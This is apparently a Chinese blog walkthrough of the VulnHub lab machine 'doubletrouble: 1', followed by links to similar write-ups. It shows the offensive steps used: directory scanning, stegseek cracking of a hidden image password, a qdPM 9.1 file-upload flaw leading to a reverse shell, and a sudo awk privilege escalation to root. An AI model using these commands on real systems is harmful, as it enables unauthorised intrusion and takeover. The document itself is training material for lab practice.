vulnhunb之doubletrouble:1

最新推荐文章于 2025-01-14 19:36:40 发布
原创 最新推荐文章于 2025-01-14 19:36:40 发布 · 1.8k 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#linux #web安全 #系统安全

本文记录了一次靶机渗透测试的过程,包括IP扫描、利用远程文件上传漏洞、隐写术破解及提权等步骤。

由于这个靶机比较简单,所以我就直接写渗透过程了:

首先进行ip扫描

 于是打开网页进行查看

 发现他是qdPM 9.1搭建,我在网上查找发他有远程文件上传的漏洞,但是我们又没有用户名密码,于是我进行目录扫描

NVD - CVE-2020-7246

gobuster dir -r -u http://192.168.181.166/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,txt,html,bak

 于是我在/secret下发现一个图片

 其他目录没有发现其他漏洞,于是我认为这个图片是有隐写的

如何使用Stegseek破解经过Steghide隐写的数据 | 演道网

上面的网页是工具下载的地址,他是一个基于steghigh的一个快速扫描的工具

wget http://192.168.181.166/secret/doubletrouble.jpg

stegseek doubletrouble.jpg /usr/share/wordlists/rockyou.txt/rockyou.txt -xf output

 

 于是我查看你output

发现了一个用户名密码,于是我们进行登录

登录成功 ,于是我进行文件上传

首先在kali上开启http的服务·

python3 -m http.server 4444

 

进行文件上传

 文件上传成功

 运行shell并进行shell反弹

 查看当前的用户

python -c 'import pty; pty.spawn("/bin/bash")'

 

于是进行提权

先查看一个有没有可以提权的工具

但是好像没有,于是我使用

sudo -l

 

于是我查看提权的命令

https://gtfobins.github.io/gtfobins/awk/#sudo

sudo awk 'BEGIN {system("/bin/sh")}'

 于是获得了root权限

 

【Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 749
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
vulnhub靶场【DoubleTrouble
最新发布
China_I_LOVE的博客
01-16 1049
网站目录爆破图片隐写内容及其密码的暴力破解通过上传头像处的文件上传漏洞,促使反弹shell的使用,以及发现CMS版本漏洞,会利用对于sudo各种命令的提权。
vulnhub doubletrouble: 1
箭雨镜屋
04-23 3543
渗透思路:nmap扫描----gobuster扫描网站目录----stegseek爆破图片隐写密码,获得网站用户密码----利用qdPM 9.1远程命令执行(任意文件上传)漏洞getshell----awk sudo提权
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 733
Vulnhub——DOUBLETROUBLE: 1
vulnhub靶机-doubletrouble: 1
yc11223344的博客
08-25 935
攻击机:192.168.100.128靶机:192.168.100.130。
doubletrouble:html5 w vim快捷方式中的两人游戏
05-26
双重麻烦 带有html5 w / vim快捷键的... 要开始玩,请抓住一个朋友并前往 如果您有兴趣帮助: git clone https://github.com/jonathanballs/doubletrouble.git cd doubletrouble npm install . 启动服务器 node .
两人在线游戏doubletrouble:使用html5和vim快捷键
JavaScript是"doubletrouble"游戏的主要开发语言之一,因此游戏的核心逻辑可能需要良好的JavaScript编程技能。 7. 项目启动与服务器运行: 在"doubletrouble"项目中,开发者需要先通过命令行克隆项目仓库,安装依赖...
doubletrouble
qq_46140711的博客
09-26 956
doubletrouble渗透过程
【Vulnhub靶场】DOUBLETROUBLE: 1 通关writeup
weixin_44588899的博客
05-20 1237
环境 靶机地址:https://www.vulnhub.com/entry/doubletrouble-1,743/ kali攻击机ip:192.168.220.128 靶机 ip: 靶机地址: 使用命令: arp-scan -l 探测发现是:192.168.220.130 开始探测 nmap -T4 -p- -A 192.168.220.130 发现开放22、80端口, 打开http://192.168.220.130 /,是一个登录框,没什么有价值的东西,直接扫目录吧。 dirb http:
[Vulnhub]doubletrouble: 1
qq_48749937的博客
02-21 4054
kali ip:192.168.56.105 靶机ip:192.168.56.106 扫描靶机开放端口:nmap -sS -p- 192.168.56.106 访问http服务,发现一个登录界面
vulnhub之doubletrouble: 1
weixin_54431413的博客
06-05 2449
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
vulnhub靶场----DOUBLETROUBLE: 1
woshicainiao666的博客
02-22 739
隐写,爆破,awk提权
vulnhub-doubletrouble
weixin_50683638的博客
12-08 584
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
Vulnhub靶机:doubletrouble
qq_48904485的博客
01-06 1257
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:doubletrouble10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vlunhub系列-dobletrouble靶机
hanjinming110的博客
03-02 417
vlunhub系列之dobletrouble靶机
vulnhub靶机:doubletrouble
waitagirl的博客
03-21 795
vulnhub靶机:doubletrouble
vulnhub:doubletrouble1靶机
qq_63283137的博客
10-03 281
根据之前爆破的uploads目录,查看已经上传成功(要多观察下文件到底上传成功没有),爆出两组的账户密码,尝试登录80端口http、22端口ssh。查看当前用户的sudo权限,发现可以sudo执行awk命令。是个管理员登录界面,使用burp弱口令爆破,无用。发现这个主题有个文件上传的命令执行漏洞,先留着。#-xf 将破解出的信息存放到指定的文件里。是个登录界面,随手ssh爆破试试。尝试访问上面的目录,发现有个图片。发现有个ova镜像文件,下载下来。在访问上传的文件之前执行监听。分析漏洞,发现可以上传文件。
vulnhub靶机--DoubleTrouble
qq_63233616的博客
01-14 1266
之所以会叫DoubleTrouble,是因为靶机作者会在初始靶机中暗藏另外一个靶机。主要用到的知识点:图像隐写、qdPM9.1的RCE、awk提权、部分常用工具的使用。
vulnhub靶机 doubletrouble
weixin_46107179的博客
05-14 533
靶机下载地址:下载链接 主机发现 因为在同一网段,所以直接用arp-scan -l 扫描,得到靶机ip地址 信息搜集 通过nmap进行信息搜集,得到开放端口22,80,并且有一个标题为qdPM 打开网页进行80端口的查看,发现只是一个登录页面 从中我们可以得到信息是关于qdPM9.1(一款基于Web的开源项目管理工具),从网上可以搜索到相关的命令执行漏洞,我们通过kali里面的searchsploit搜索一下,结果有可以利用的exp 接下来,直接将其两个可远程执行代码的exp拷贝下来,发现这两个的e
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值